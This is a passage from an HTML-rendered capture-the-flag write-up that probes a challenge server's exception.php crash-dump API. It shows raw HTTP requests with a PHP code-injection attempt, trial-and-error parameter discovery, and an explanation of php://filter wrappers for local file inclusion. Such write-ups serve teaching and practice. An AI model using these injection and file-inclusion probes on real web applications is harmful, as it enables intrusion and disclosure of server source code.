&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 15:28:33 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;488&lt;/span&gt;

{
    &amp;quot;message&amp;quot;: &amp;quot;&lt;span class="cp"&gt;&amp;lt;?php phpinfo(); ?&amp;gt;&lt;/span&gt;&amp;quot;,
    &amp;quot;lmessage&amp;quot;: &amp;quot;Message.&amp;quot;,
    &amp;quot;strace&amp;quot;: &amp;quot;Stack trace&amp;quot;,
    &amp;quot;sdkint&amp;quot;: &amp;quot;25&amp;quot;,
    &amp;quot;device&amp;quot;: &amp;quot;generic_x86&amp;quot;,
    &amp;quot;product&amp;quot;: &amp;quot;sdk_google_phone_x86&amp;quot;,
    &amp;quot;lversion&amp;quot;: &amp;quot;3.10.0+&amp;quot;,
    &amp;quot;vmheapsz&amp;quot;: &amp;quot;123054440&amp;quot;,
    &amp;quot;vmallocmem&amp;quot;: &amp;quot;119010712&amp;quot;,
    &amp;quot;vmheapszlimit&amp;quot;: &amp;quot;536870912&amp;quot;,
    &amp;quot;natallocmem&amp;quot;: &amp;quot;7198792&amp;quot;,
    &amp;quot;cpuusage&amp;quot;: &amp;quot;0.08108108&amp;quot;,
    &amp;quot;totalstor&amp;quot;: &amp;quot;1560133632&amp;quot;,
    &amp;quot;freestor&amp;quot;: &amp;quot;120262656&amp;quot;,
    &amp;quot;busystor&amp;quot;: &amp;quot;1439870976&amp;quot;,
    &amp;quot;udid&amp;quot;: &amp;quot;58bc60a3ff0f2f1a&amp;quot;
}
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;No such luck, our code was not executed. By playing with other parameters, I
got this error message when I modified the &lt;code&gt;operation&lt;/code&gt; parameter:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;419&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Test&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;lt;?php phpinfo(); ?&amp;gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;lmessage&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Message.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;strace&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Stack trace&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;sdkint&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;25&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;device&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;generic_x86&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;product&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;sdk_google_phone_x86&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;lversion&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;3.10.0+&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmheapsz&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;123054440&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmallocmem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;119010712&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;vmheapszlimit&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;536870912&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;natallocmem&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;7198792&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;cpuusage&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;0.08108108&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;totalstor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;1560133632&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;freestor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;120262656&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;busystor&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;1439870976&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;udid&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;58bc60a3ff0f2f1a&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 15:30:29 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;82&lt;/span&gt;

Fatal error! JSON key &amp;#39;operation&amp;#39; must be set to WriteCrashDump or ReadCrashDump.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, so we can create crash dump file, but we can also read from them. Let's try
to read one. Since I don't know how this API function works, I tried creating
a valid &lt;code&gt;ReadCrashDump&lt;/code&gt; request by trial and error:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;29&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;ReadCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 15:33:00 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;42&lt;/span&gt;

Fatal error! JSON key &amp;#39;data&amp;#39; must be set.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, a &lt;code&gt;data&lt;/code&gt; key must be set. Let's try this:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;40&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;ReadCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 15:34:02 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;47&lt;/span&gt;

Fatal error! JSON key &amp;#39;crashdump&amp;#39; must be set.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, we now need a &lt;code&gt;crashdump&lt;/code&gt; key. Let's add it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;57&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;ReadCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nt"&gt;&amp;quot;crashdump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 15:35:03 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;47&lt;/span&gt;

Fatal error! JSON key &amp;#39;crashdump&amp;#39; must be set.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, the server does not seem to like where we put our &lt;code&gt;crashdump&lt;/code&gt; key.
Maybe we should put it in the &lt;code&gt;data&lt;/code&gt; object?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;56&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;ReadCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;crashdump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;500&lt;/span&gt; &lt;span class="ne"&gt;Internal Server Error&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 15:36:09 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;0&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we got a 500 error. Our syntax seems to be correct, but the server
generated an error, probably because we didn't put anything in the
&lt;code&gt;crashdump&lt;/code&gt; key. Let's try to put one of our file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/exception.php&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ex.northpolewonderland.com&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;76&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;operation&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;ReadCrashDump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;:{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;crashdump&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;crashdump-yoerjb.php&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;}}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 29 Dec 2016 15:38:36 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;66&lt;/span&gt;

Fatal error! crashdump value duplicate &amp;#39;.php&amp;#39; extension detected.
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We got a &amp;quot;fatal error&amp;quot;, but the web server returned a 200 OK code. This
probably means that we encountered an application error, but not an HTTP error.
The error message looks like there is custom filtering on the &lt;code&gt;crashdump&lt;/code&gt;
parameter. Filtering on &lt;code&gt;.php&lt;/code&gt; extensions seems like a filter against
Local File Inclusion. The &lt;code&gt;crashdump&lt;/code&gt; parameter is most likely used to
include one of the created crash dump file.&lt;/p&gt;
&lt;p&gt;Since &lt;code&gt;.php&lt;/code&gt; extensions seem to be filtered, this LFI seems a good
candidate for &lt;a class="reference external" href="http://php.net/manual/en/wrappers.php.php"&gt;PHP wrappers&lt;/a&gt;. PHP
wrappers are URL starting with &lt;code&gt;php://&lt;/code&gt;. They can be used to access
different I/O streams, and work on them directly. One of these wrappers, and
a very interesting one in the case of an LFI is the
&lt;a class="reference external" href="http://php.net/manual/en/wrappers.php.php#refsect2-wrappers.php-unknown-unknown-unknown-unknown-unknown-unknown-descriptiot"&gt;filter&lt;/a&gt;
wrapper. The &lt;code&gt;filter&lt;/code&gt; wrapper can be used to manipulate files present on
the file system, and transform them (base64-encode, ROT13-encode, etc.). Since
the server seems to append &lt;code&gt;.php&lt;/code&gt; automatically to the &lt;code&gt;crashdump&lt;/code&gt;
parameter (cue the error message), we can use a &lt;code&gt;php://filter&lt;/code&gt; to read
files from the server, such as source code file. Let's try to read the
&lt;code&gt;exception.php&lt;/code&gt; file:&lt;/p&gt;
